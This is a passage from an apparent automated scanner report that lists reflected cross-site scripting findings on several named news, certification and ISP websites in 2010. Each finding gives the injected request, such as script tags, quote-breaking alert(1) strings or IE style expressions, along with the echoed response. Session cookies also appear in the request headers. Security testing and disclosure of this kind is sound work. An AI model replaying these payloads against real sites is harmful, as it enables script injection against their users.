Cookie: BIGipServerTOPS-WebFarm5=604050348.20480.0000; UserLastLogin=2010-11-20 00:17:12; cookieEVar1=standard; title=ALL DATES; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmc=129518793; s_vnumb=1290230323693%3E0%3A1; s_vi=[CS]v1|2673AD10851D12D2-6000012C0002F184[CE]; __utma=129518793.178290496.1290230241.1290230241.1290230241.1; __utmz=129518793.1290230248.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=toronto%20top%20newspapers

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-4
X-TOPS-CacheReason: Speed
cache-control: public, max-age = 300
Date: Sun, 21 Nov 2010 15:22:22 GMT
X-Varnish: 2036333551
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish4
X-Cache: MISS
Content-Length: 60709


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<meta name="Title" content=">>6cab3"style="x:expression(alert(1))"28a7f4da4bb - thestar.com" />
...[SNIP]...

2.779. http://www.toronto.com/restaurants/listing/000-225-233/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.toronto.com
Path:   /restaurants/listing/000-225-233/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 699aa'%3bc349c154424 was submitted in the REST URL parameter 1. This input was echoed as 699aa';c349c154424 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /restaurants699aa'%3bc349c154424/listing/000-225-233/ HTTP/1.1
Host: www.toronto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1290207904259; __utmz=151952060.1290203995.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; __utma=151952060.1738131712.1290203995.1290203995.1290207904.2; __utmc=151952060; __utmb=151952060.3.10.1290207904; BIGipServerTOPS-WebFarm5=604050348.20480.0000;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-1
X-TOPS-CacheReason: Speed
cache-control: public, max-age = 300
Content-Length: 59829
Date: Fri, 19 Nov 2010 23:53:21 GMT
X-Varnish: 2022476633
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache-Svr: topsvarnish4
X-Cache: MISS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.or
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/971801/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_restaurants699aa';c349c154424_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

2.780. http://www.toronto.com/searchResults [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toronto.com
Path:   /searchResults

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f10db"%3balert(1)//c37c34afd0f was submitted in the q parameter. This input was echoed as f10db";alert(1)//c37c34afd0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchResults?q=f10db"%3balert(1)//c37c34afd0f HTTP/1.1
Host: www.toronto.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerTOPS-WebFarm5=604050348.20480.0000; __utmz=151952060.1290203995.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_lastvisit=1290203994592; __utma=151952060.1738131712.1290203995.1290203995.1290203995.1; __utmc=151952060; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Fri, 19 Nov 2010 23:51:03 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-4
cache-control: public, max-age = 86400
X-TOPS-CacheReason: TDCsearch
Date: Fri, 19 Nov 2010 23:50:05 GMT
X-Varnish: 2022444699
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish4
X-Cache: MISS
Content-Length: 47643


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>



...[SNIP]...
<script>
yahooSeachSuggestion("f10db";alert(1)//c37c34afd0f");
</script>
...[SNIP]...

2.781. http://www.toronto.com/searchResults [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toronto.com
Path:   /searchResults

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bca1"><script>alert(1)</script>6d6d3fb552 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-20102bca1"><script>alert(1)</script>6d6d3fb552 HTTP/1.1
Host: www.toronto.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerTOPS-WebFarm5=604050348.20480.0000; __utmz=151952060.1290203995.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_lastvisit=1290203994592; __utma=151952060.1738131712.1290203995.1290203995.1290203995.1; __utmc=151952060; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Fri, 19 Nov 2010 23:50:59 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-5
cache-control: public, max-age = 86400
X-TOPS-CacheReason: TDCsearch
Date: Fri, 19 Nov 2010 23:49:59 GMT
X-Varnish: 2022443909
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish4
X-Cache: MISS
Content-Length: 45727


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>



...[SNIP]...
</script>Hoyt LLC PoC XSS 11-19-20102bca1"><script>alert(1)</script>6d6d3fb552 - toronto.com" />
...[SNIP]...

2.782. http://www.truste.org/ivalidate.php [sealid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.truste.org
Path:   /ivalidate.php

Issue detail

The value of the sealid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 5de40%20style%3dx%3aexpression(alert(1))%20430d8af0289 was submitted in the sealid parameter. This input was echoed as 5de40 style=x:expression(alert(1)) 430d8af0289 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ivalidate.php?url=www.verizon.com&sealid=1015de40%20style%3dx%3aexpression(alert(1))%20430d8af0289 HTTP/1.1
Host: www.truste.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 17:11:56 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
X-Powered-By: PHP/5.1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 10799


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Validation Page for Online Privacy Certification b
...[SNIP]...
<input type='hidden' name='sealid' value=1015de40 style=x:expression(alert(1)) 430d8af0289>
...[SNIP]...

2.783. http://www.typepad.com/services/toolbar [autofollowed parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.typepad.com
Path:   /services/toolbar

Issue detail

The value of the autofollowed request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9c442%3balert(1)//d1d3d6f05cc was submitted in the autofollowed parameter. This input was echoed as 9c442;alert(1)//d1d3d6f05cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/toolbar?blog_id=6a00e5539a1041883400e5539cc1148834&asset_id=6a00e5539a10418834013488c52173970c&atype=Individual&to=http%3A%2F%2Fthompson.blog.avg.com%2F2010%2F11%2Fheads-up-0-day-in-an-exploit-kit.html&autofollowed=09c442%3balert(1)//d1d3d6f05cc&safe_to_modify_body=0 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://thompson.blog.avg.com/2010/11/heads-up-0-day-in-an-exploit-kit.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.typepad.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sun, 21 Nov 2010 13:59:41 GMT
Server: Apache
X-Webserver: oak-tp-app007
Cache-Control: private
Pragma: no-cache
Vary: cookie,negotiate,accept-language,Accept-Encoding
Content-Language: en
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Content-Length: 15015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:at="http://www.sixapart.c
...[SNIP]...
lorAnim = YAHOO.util.ColorAnim,
Easing = YAHOO.util.Easing,
Cookie = YAHOO.util.Cookie,
TPToolbar = {};

TPToolbar = {

params: {
autofollowed: 09c442;alert(1)//d1d3d6f05cc,
blog_user_xid: '6p00e5539a10418834',
display: 0,
entry_xid: '6a00e5539a10418834013488c52173970c',
logged_in: 0,
safe_to_mod
...[SNIP]...

2.784. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcstar.com
Path:   /news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b1e4"><script>alert(1)</script>848a53b6555 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news8b1e4"><script>alert(1)</script>848a53b6555/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ HTTP/1.1
Host: www.vcstar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NOT FOUND
Date: Fri, 19 Nov 2010 23:53:48 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 126607
X-Varnish: 1516963255
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<form action="/accounts/login/?next=/news8b1e4"><script>alert(1)</script>848a53b6555/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/" method="post" id="loginform1">
...[SNIP]...

2.785. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcstar.com
Path:   /news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fe3a"><script>alert(1)</script>2ee8222a28c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/20102fe3a"><script>alert(1)</script>2ee8222a28c/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ HTTP/1.1
Host: www.vcstar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NOT FOUND
Date: Fri, 19 Nov 2010 23:54:17 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 126541
X-Varnish: 2139997850
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<form action="/accounts/login/?next=/news/20102fe3a"><script>alert(1)</script>2ee8222a28c/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/" method="post" id="loginform1">
...[SNIP]...

2.786. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcstar.com
Path:   /news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6df02"><script>alert(1)</script>9c223c4de64 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/2010/aug6df02"><script>alert(1)</script>9c223c4de64/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ HTTP/1.1
Host: www.vcstar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NOT FOUND
Date: Fri, 19 Nov 2010 23:55:16 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 126607
X-Varnish: 1516965083
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<form action="/accounts/login/?next=/news/2010/aug6df02"><script>alert(1)</script>9c223c4de64/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/" method="post" id="loginform1">
...[SNIP]...

2.787. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcstar.com
Path:   /news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a6d0"><script>alert(1)</script>71958491b76 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/2010/aug/053a6d0"><script>alert(1)</script>71958491b76/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ HTTP/1.1
Host: www.vcstar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NOT FOUND
Date: Fri, 19 Nov 2010 23:56:08 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 126607
X-Varnish: 2140000072
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<form action="/accounts/login/?next=/news/2010/aug/053a6d0"><script>alert(1)</script>71958491b76/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/" method="post" id="loginform1">
...[SNIP]...

2.788. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcstar.com
Path:   /news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52330"><script>alert(1)</script>8f59bc4729 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln52330"><script>alert(1)</script>8f59bc4729/ HTTP/1.1
Host: www.vcstar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NOT FOUND
Date: Fri, 19 Nov 2010 23:57:57 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 126600
X-Varnish: 2140002696
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<form action="/accounts/login/?next=/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln52330"><script>alert(1)</script>8f59bc4729/" method="post" id="loginform1">
...[SNIP]...

2.789. http://www.verizon.net/central/bookmark [WT.ti parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizon.net
Path:   /central/bookmark

Issue detail

The value of the WT.ti request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2114"-alert(1)-"2cd6e3349c6 was submitted in the WT.ti parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /central/bookmark?action=bbeat&WT.ti=Central/Header/vzsurround_lnkoute2114"-alert(1)-"2cd6e3349c6 HTTP/1.1
Host: www.verizon.net
Proxy-Connection: keep-alive
Referer: http://www.verizon.net/central/appmanager/portal/vzcentral
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 152
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:47:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:47:43 GMT
Connection: close
Vary: Accept-Encoding


<script>
   window.location = "http://surround.verizon.net?WT.ti=Central/Header/vzsurround_lnkoute2114"-alert(1)-"2cd6e3349c6";
</script>

2.790. http://www.verizon.net/central/bookmark [channel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizon.net
Path:   /central/bookmark

Issue detail

The value of the channel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a257"-alert(1)-"dfffcb2575a was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /central/bookmark?action=googlesearch&q='&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr2a257"-alert(1)-"dfffcb2575a HTTP/1.1
Host: www.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ; ASPSESSIONIDCSRRSSBB=GPELJEBDJBIPHJOBICKILKME; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 02:07:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:07:38 GMT
Connection: close


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr2a257"-alert(1)-"dfffcb2575a";
</script>

2.791. http://www.verizon.net/central/bookmark [clientid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizon.net
Path:   /central/bookmark

Issue detail

The value of the clientid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ff42"-alert(1)-"af559367478 was submitted in the clientid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /central/bookmark?action=googlesearch&q='&web_search_type=basic&clientid=cnsmr5ff42"-alert(1)-"af559367478&channel=Nwcnsmr HTTP/1.1
Host: www.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ; ASPSESSIONIDCSRRSSBB=GPELJEBDJBIPHJOBICKILKME; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 02:07:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:07:38 GMT
Connection: close


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic&clientid=cnsmr5ff42"-alert(1)-"af559367478&channel=Nwcnsmr";
</script>

2.792. http://www.verizon.net/central/bookmark [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizon.net
Path:   /central/bookmark

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ac8b"-alert(1)-"6833c2efbb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

